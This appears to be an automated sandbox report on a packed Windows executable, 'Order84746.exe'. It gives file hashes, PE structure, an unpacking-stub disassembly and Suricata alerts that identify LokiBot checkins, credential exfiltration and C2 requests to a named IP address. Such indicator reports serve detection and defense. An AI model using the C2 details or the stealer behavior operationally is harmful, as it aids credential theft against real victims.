                        Preview:|..WWCCBEY8T..WH.1PNWTCC.AY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBA.8T3;H.I1.G.u.B..xl<ZFw85^7<69c #/7W .W2h5D>n>:c...yU;WPyEJ;tNWTCCBA..,..^..X...U.......A.......U...@..#.uu....B...W...%.....A...U.B......X.iq..........F..= +..O.T35WHG1P..TC.CEY.\_bWHG1PNWT.CA@R9X35oIG1.FWTCCB.`9T3%WHGaQNWT.CBQY8T15WMG0PNWTCFB@Y8T35WhM1PJWTCCBA[8T.5WXG1@NWTCSBAI8T35WHW1PNWTCCBAY8..4W,G1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35W.F1.NWTCCBAY8T35WHG1PNWTCCBAY8T.A2031PN.bBCBQY8T.4WHC1PNWTCCBAY8T35wHGQ~<357"BA9xT35.IG1.NWT.BBAY8T35WHG1PN.TC.l%8L535Wl.9PN.UCC@AY8*25WHG1PNWTCCBA.8T../HG1PNWTcCBAY2T3.WHG.QNWTCCBAY8T35WHG1.NWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35

                        C:\Users\user\AppData\Roaming\188E93\31437F.lck

                        Download File
                        Process:C:\Windows\SysWOW64\svchost.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:1

                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

                        Download File
                        Process:C:\Windows\SysWOW64\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):46
                        Entropy (8bit):1.0424600748477153
                        Encrypted:false
                        SSDEEP:3:/lbq:4
                        MD5:8CB7B7F28464C3FCBAE8A10C46204572
                        SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                        SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                        SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:........................................user.

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Entropy (8bit):7.91727517371604
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.39%
                        • UPX compressed Win32 Executable (30571/9) 0.30%
                        • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        File name:Order84746.exe
                        File size:532'480 bytes
                        MD5:6e891f3adbfd415fae70ff8376014769
                        SHA1:9dd2239eba106fe8b3b97992064d07c532a0c9ee
                        SHA256:a2504b173353b434fe409705dbc066fb36c9a74d45a36d89ee421a1da3b4461b
                        SHA512:c125badd57a5acc02bb10091ac1fa4e6881ab9bca4df4f01f7dd61f4ac92795edacac8a0117603d4ec69a684e6752ab25d734c14a149f720314da1c33df35806
                        SSDEEP:12288:EOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPizdEsy9jgO1d5v5/BsuogV+a:Eq5TfcdHj4fmbGVWgO75B/h+a
                        TLSH:5FB42381A8D4CC62E7A13331C17ACFA106A57D31CDC52F6D57A8F19EB831643A982B7D
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                        File Icon

                        Icon Hash:aaf3e3e3938382a0

                        Static PE Info

                        General

                        Entrypoint:0x505f50
                        Entrypoint Section:UPX1
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x6749572B [Fri Nov 29 05:54:51 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:ef471c0edf1877cd5a881a6a8bf647b9

                        Entrypoint Preview

                        Instruction
                        pushad
                        mov esi, 004B2000h
                        lea edi, dword ptr [esi-000B1000h]
                        push edi
                        jmp 00007F88BCB1716Dh
                        nop
                        mov al, byte ptr [esi]
                        inc esi
                        mov byte ptr [edi], al
                        inc edi
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F88BCB1714Fh
                        mov eax, 00000001h
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        add ebx, ebx
                        jnc 00007F88BCB1716Dh
                        jne 00007F88BCB1718Ah
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F88BCB17181h
                        dec eax
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        jmp 00007F88BCB17136h
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        jmp 00007F88BCB171B4h
                        xor ecx, ecx
                        sub eax, 03h
                        jc 00007F88BCB17173h
                        shl eax, 08h
                        mov al, byte ptr [esi]
                        inc esi
                        xor eax, FFFFFFFFh
                        je 00007F88BCB171D7h
                        sar eax, 1
                        mov ebp, eax
                        jmp 00007F88BCB1716Dh
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F88BCB1712Eh
                        inc ecx
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F88BCB17120h
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        add ebx, ebx
                        jnc 00007F88BCB17151h
                        jne 00007F88BCB1716Bh
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jnc 00007F88BCB17146h
                        add ecx, 02h
                        cmp ebp, FFFFFB00h
                        adc ecx, 02h
                        lea edx, dword ptr [edi+ebp]
                        cmp ebp, FFFFFFFCh
                        jbe 00007F88BCB17170h
                        mov al, byte ptr [edx]

                        Rich Headers

                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [ASM] VS2012 UPD4 build 61030
                        • [RES] VS2012 UPD4 build 61030
                        • [LNK] VS2012 UPD4 build 61030

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1343ec0x424.rsrc
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1070000x2d3ec.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1348100x18.rsrc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1061340x48UPX1
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        UPX00x10000xb10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        UPX10xb20000x550000x542001012b37c3e0f9403bfd950a6e58642afFalse0.9887223718424963data7.937042659102802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x1070000x2e0000x2da00e33689e4881e3fbb36f7458f6772917fFalse0.8873394691780822data7.795435484430241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x1075ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                        RT_ICON0x1076d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                        RT_ICON0x1078040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                        RT_ICON0x1079300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                        RT_ICON0x107c1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                        RT_ICON0x107d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                        RT_ICON0x108bf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                        RT_ICON0x1094a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                        RT_ICON0x109a0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                        RT_ICON0x10bfb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                        RT_ICON0x10d0640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                        RT_MENU0xca4a00x50dataEnglishGreat Britain1.1375
                        RT_STRING0xca4f00x594dataEnglishGreat Britain1.007703081232493
                        RT_STRING0xcaa840x68adataEnglishGreat Britain1.0065710872162486
                        RT_STRING0xcb1100x490dataEnglishGreat Britain1.009417808219178
                        RT_STRING0xcb5a00x5fcdataEnglishGreat Britain1.0071801566579635
                        RT_STRING0xcbb9c0x65cdataEnglishGreat Britain1.0067567567567568
                        RT_STRING0xcc1f80x466dataEnglishGreat Britain1.0097690941385435
                        RT_STRING0xcc6600x158dataEnglishGreat Britain1.0319767441860466
                        RT_RCDATA0x10d4d00x269c1data1.0003541054095924
                        RT_GROUP_ICON0x133e980x76dataEnglishGreat Britain0.6610169491525424
                        RT_GROUP_ICON0x133f140x14dataEnglishGreat Britain1.25
                        RT_GROUP_ICON0x133f2c0x14dataEnglishGreat Britain1.15
                        RT_GROUP_ICON0x133f440x14dataEnglishGreat Britain1.25
                        RT_VERSION0x133f5c0xdcdataEnglishGreat Britain0.6181818181818182
                        RT_MANIFEST0x13403c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                        Imports

                        DLLImport
                        KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                        ADVAPI32.dllAddAce
                        COMCTL32.dllImageList_Remove
                        COMDLG32.dllGetSaveFileNameW
                        GDI32.dllLineTo
                        IPHLPAPI.DLLIcmpSendEcho
                        MPR.dllWNetUseConnectionW
                        ole32.dllCoGetObject
                        OLEAUT32.dllVariantInit
                        PSAPI.DLLGetProcessMemoryInfo
                        SHELL32.dllDragFinish
                        USER32.dllGetDC
                        USERENV.dllLoadUserProfileW
                        UxTheme.dllIsThemeActive
                        VERSION.dllVerQueryValueW
                        WININET.dllFtpOpenFileW
                        WINMM.dlltimeGetTime
                        WSOCK32.dllsocket

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishGreat Britain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-11-29T07:37:00.208189+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973094.156.177.4180TCP
                        2024-11-29T07:37:00.208189+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973094.156.177.4180TCP
                        2024-11-29T07:37:00.208189+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973094.156.177.4180TCP
                        2024-11-29T07:37:01.743805+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973094.156.177.4180TCP
                        2024-11-29T07:37:02.129463+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973194.156.177.4180TCP
                        2024-11-29T07:37:02.129463+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973194.156.177.4180TCP
                        2024-11-29T07:37:02.129463+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973194.156.177.4180TCP
                        2024-11-29T07:37:03.474759+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973194.156.177.4180TCP
                        2024-11-29T07:37:03.780451+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973294.156.177.4180TCP
                        2024-11-29T07:37:03.780451+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973294.156.177.4180TCP
                        2024-11-29T07:37:03.780451+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973294.156.177.4180TCP
                        2024-11-29T07:37:05.072766+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973294.156.177.4180TCP
                        2024-11-29T07:37:05.072766+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973294.156.177.4180TCP
                        2024-11-29T07:37:05.193223+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449732TCP
                        2024-11-29T07:37:05.683692+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973394.156.177.4180TCP
                        2024-11-29T07:37:05.683692+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973394.156.177.4180TCP
                        2024-11-29T07:37:05.683692+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973394.156.177.4180TCP
                        2024-11-29T07:37:07.366794+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973394.156.177.4180TCP
                        2024-11-29T07:37:07.366794+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973394.156.177.4180TCP
                        2024-11-29T07:37:07.486946+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449733TCP
                        2024-11-29T07:37:07.798758+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973494.156.177.4180TCP
                        2024-11-29T07:37:07.798758+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973494.156.177.4180TCP
                        2024-11-29T07:37:07.798758+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973494.156.177.4180TCP
                        2024-11-29T07:37:10.975348+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973494.156.177.4180TCP
                        2024-11-29T07:37:10.975348+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973494.156.177.4180TCP
                        2024-11-29T07:37:11.095624+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449734TCP
                        2024-11-29T07:37:11.363666+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973594.156.177.4180TCP
                        2024-11-29T07:37:11.363666+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973594.156.177.4180TCP
                        2024-11-29T07:37:11.363666+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973594.156.177.4180TCP
                        2024-11-29T07:37:12.885873+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973594.156.177.4180TCP
                        2024-11-29T07:37:12.885873+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973594.156.177.4180TCP
                        2024-11-29T07:37:13.005901+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449735TCP
                        2024-11-29T07:37:13.268211+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973694.156.177.4180TCP
                        2024-11-29T07:37:13.268211+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973694.156.177.4180TCP
                        2024-11-29T07:37:13.268211+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973694.156.177.4180TCP
                        2024-11-29T07:37:14.639768+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973694.156.177.4180TCP
                        2024-11-29T07:37:14.639768+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973694.156.177.4180TCP
                        2024-11-29T07:37:14.759712+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449736TCP
                        2024-11-29T07:37:15.019342+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973894.156.177.4180TCP
                        2024-11-29T07:37:15.019342+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973894.156.177.4180TCP
                        2024-11-29T07:37:15.019342+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973894.156.177.4180TCP
                        2024-11-29T07:37:16.454677+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973894.156.177.4180TCP
                        2024-11-29T07:37:16.454677+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973894.156.177.4180TCP
                        2024-11-29T07:37:16.574591+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449738TCP
                        2024-11-29T07:37:16.845716+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974094.156.177.4180TCP
                        2024-11-29T07:37:16.845716+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974094.156.177.4180TCP
                        2024-11-29T07:37:16.845716+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974094.156.177.4180TCP
                        2024-11-29T07:37:21.366370+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974094.156.177.4180TCP
                        2024-11-29T07:37:21.366370+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974094.156.177.4180TCP
                        2024-11-29T07:37:21.486611+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449740TCP
                        2024-11-29T07:37:21.749992+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974494.156.177.4180TCP
                        2024-11-29T07:37:21.749992+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974494.156.177.4180TCP
                        2024-11-29T07:37:21.749992+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974494.156.177.4180TCP
                        2024-11-29T07:37:23.076999+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974494.156.177.4180TCP
                        2024-11-29T07:37:23.076999+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974494.156.177.4180TCP
                        2024-11-29T07:37:23.197276+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449744TCP
                        2024-11-29T07:37:23.468794+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974694.156.177.4180TCP
                        2024-11-29T07:37:23.468794+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974694.156.177.4180TCP
                        2024-11-29T07:37:23.468794+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974694.156.177.4180TCP
                        2024-11-29T07:37:24.907443+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974694.156.177.4180TCP
                        2024-11-29T07:37:24.907443+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974694.156.177.4180TCP
                        2024-11-29T07:37:25.027569+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449746TCP
                        2024-11-29T07:37:25.297011+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974794.156.177.4180TCP
                        2024-11-29T07:37:25.297011+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974794.156.177.4180TCP
                        2024-11-29T07:37:25.297011+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974794.156.177.4180TCP
                        2024-11-29T07:37:29.724840+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974794.156.177.4180TCP
                        2024-11-29T07:37:29.724840+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974794.156.177.4180TCP
                        2024-11-29T07:37:29.844766+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449747TCP
                        2024-11-29T07:37:30.107976+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974894.156.177.4180TCP
                        2024-11-29T07:37:30.107976+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974894.156.177.4180TCP
                        2024-11-29T07:37:30.107976+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974894.156.177.4180TCP
                        2024-11-29T07:37:31.916984+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974894.156.177.4180TCP
                        2024-11-29T07:37:31.916984+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974894.156.177.4180TCP
                        2024-11-29T07:37:32.037107+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449748TCP
                        2024-11-29T07:37:32.298014+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974994.156.177.4180TCP
                        2024-11-29T07:37:32.298014+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974994.156.177.4180TCP
                        2024-11-29T07:37:32.298014+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974994.156.177.4180TCP
                        2024-11-29T07:37:33.620651+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974994.156.177.4180TCP
                        2024-11-29T07:37:33.620651+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974994.156.177.4180TCP
                        2024-11-29T07:37:33.740688+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449749TCP
                        2024-11-29T07:37:34.000360+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975094.156.177.4180TCP
                        2024-11-29T07:37:34.000360+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975094.156.177.4180TCP
                        2024-11-29T07:37:34.000360+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975094.156.177.4180TCP
                        2024-11-29T07:37:35.522594+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975094.156.177.4180TCP
                        2024-11-29T07:37:35.522594+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975094.156.177.4180TCP
                        2024-11-29T07:37:35.642714+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449750TCP
                        2024-11-29T07:37:35.905770+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975194.156.177.4180TCP
                        2024-11-29T07:37:35.905770+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975194.156.177.4180TCP
                        2024-11-29T07:37:35.905770+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975194.156.177.4180TCP
                        2024-11-29T07:37:37.284247+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975194.156.177.4180TCP
                        2024-11-29T07:37:37.284247+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975194.156.177.4180TCP
                        2024-11-29T07:37:37.404244+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449751TCP
                        2024-11-29T07:37:37.671798+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975294.156.177.4180TCP
                        2024-11-29T07:37:37.671798+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975294.156.177.4180TCP
                        2024-11-29T07:37:37.671798+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975294.156.177.4180TCP
                        2024-11-29T07:37:39.136283+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975294.156.177.4180TCP
                        2024-11-29T07:37:39.136283+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975294.156.177.4180TCP
                        2024-11-29T07:37:39.256251+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449752TCP
                        2024-11-29T07:37:39.516381+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975394.156.177.4180TCP
                        2024-11-29T07:37:39.516381+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975394.156.177.4180TCP
                        2024-11-29T07:37:39.516381+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975394.156.177.4180TCP
                        2024-11-29T07:37:40.913875+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975394.156.177.4180TCP
                        2024-11-29T07:37:40.913875+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975394.156.177.4180TCP
                        2024-11-29T07:37:41.033957+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449753TCP
                        2024-11-29T07:37:41.298199+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975494.156.177.4180TCP
                        2024-11-29T07:37:41.298199+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975494.156.177.4180TCP
                        2024-11-29T07:37:41.298199+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975494.156.177.4180TCP
                        2024-11-29T07:37:42.666274+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975494.156.177.4180TCP
                        2024-11-29T07:37:42.666274+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975494.156.177.4180TCP
                        2024-11-29T07:37:42.786866+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449754TCP
                        2024-11-29T07:37:43.127928+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975594.156.177.4180TCP
                        2024-11-29T07:37:43.127928+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975594.156.177.4180TCP
                        2024-11-29T07:37:43.127928+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975594.156.177.4180TCP
                        2024-11-29T07:37:44.438287+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975594.156.177.4180TCP
                        2024-11-29T07:37:44.438287+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975594.156.177.4180TCP
                        2024-11-29T07:37:44.558497+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449755TCP
                        2024-11-29T07:37:44.826715+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975694.156.177.4180TCP
                        2024-11-29T07:37:44.826715+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975694.156.177.4180TCP
                        2024-11-29T07:37:44.826715+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975694.156.177.4180TCP
                        2024-11-29T07:37:46.112958+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975694.156.177.4180TCP
                        2024-11-29T07:37:46.112958+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975694.156.177.4180TCP
